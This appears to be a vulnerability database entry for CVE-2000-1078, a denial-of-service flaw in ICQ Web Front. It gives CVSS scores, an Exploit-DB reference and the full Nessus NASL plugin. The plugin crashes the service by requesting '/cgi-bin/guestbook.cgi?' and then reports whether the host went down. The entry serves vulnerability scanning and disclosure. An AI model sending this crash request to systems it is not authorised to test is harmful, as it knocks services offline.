Vulnerabilities > CVE-2000-1078 - Unspecified vulnerability in Mirabilis ICQ web Front Windows9X

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
mirabilis
nessus
exploit available
NVD
Published: 2000-12-11
Updated: 2017-12-19

Summary

ICQ Web Front HTTPd allows remote attackers to cause a denial of service by requesting a URL that contains a "?" character.

Vulnerable Configurations

Part Description Count
Application
Mirabilis
1

Exploit-Db

descriptionMirabilis ICQ 0.99/98.0 a/2000.0 A/99a Remote DoS Attack Vulnerability. CVE-2000-1078. Dos exploit for cgi platform
idEDB-ID:20071
last seen2016-02-02
modified2000-03-10
published2000-03-10
reporterCharles Chear
sourcehttps://www.exploit-db.com/download/20071/
titleMirabilis ICQ 0.99/98.0 a/2000.0 A/99a Remote DoS Attack Vulnerability

Nessus

NASL familyCGI abuses
NASL idICQ_CRASH.NASL
descriptionThe remote web server appears to be the ICQ Web Front service for ICQ. An unauthenticated attacker can crash the version of ICQ Web Front installed on the remote host by connecting to it and sending a special request,
last seen2020-06-01
modified2020-06-02
plugin id10347
published2000-03-15
reporterThis script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10347
titleICQ Web Front Service guestbook.cgi DoS
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(10347);
 script_version("1.31");
 script_cvs_date("Date: 2018/11/15 20:50:17");

 script_cve_id("CVE-2000-1078");
 script_bugtraq_id(1463);

 script_name(english:"ICQ Web Front Service guestbook.cgi DoS");
 script_summary(english:"ICQ denial of service");

 script_set_attribute(attribute:"synopsis", value:"The remote host is prone to a denial of service attack.");
 script_set_attribute(attribute:"description", value:
"The remote web server appears to be the ICQ Web Front service for ICQ.

An unauthenticated attacker can crash the version of ICQ Web Front
installed on the remote host by connecting to it and sending a special
request, '/cgi-bin/guestbook.cgi?'.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/Oct/123");
 script_set_attribute(attribute:"solution", value:"Deactivate ICQ Web Front's web server service.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:N/I:N/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"2000/10/07");
 script_set_attribute(attribute:"plugin_publication_date", value:"2000/03/15");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_DENIAL);

 script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");

 script_dependencies("http_version.nasl");
 script_require_keys("Settings/ParanoidReport");
 script_require_ports(80, "Services/www");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_http_port(default:80, embedded: 1);


if (http_is_dead(port:port)) exit(0);
r = http_send_recv3(port: port, item: "/cgi-bin/guestbook.cgi?", method: "GET");
if (http_is_dead(port:port, retry: 3)) security_warning(port);

References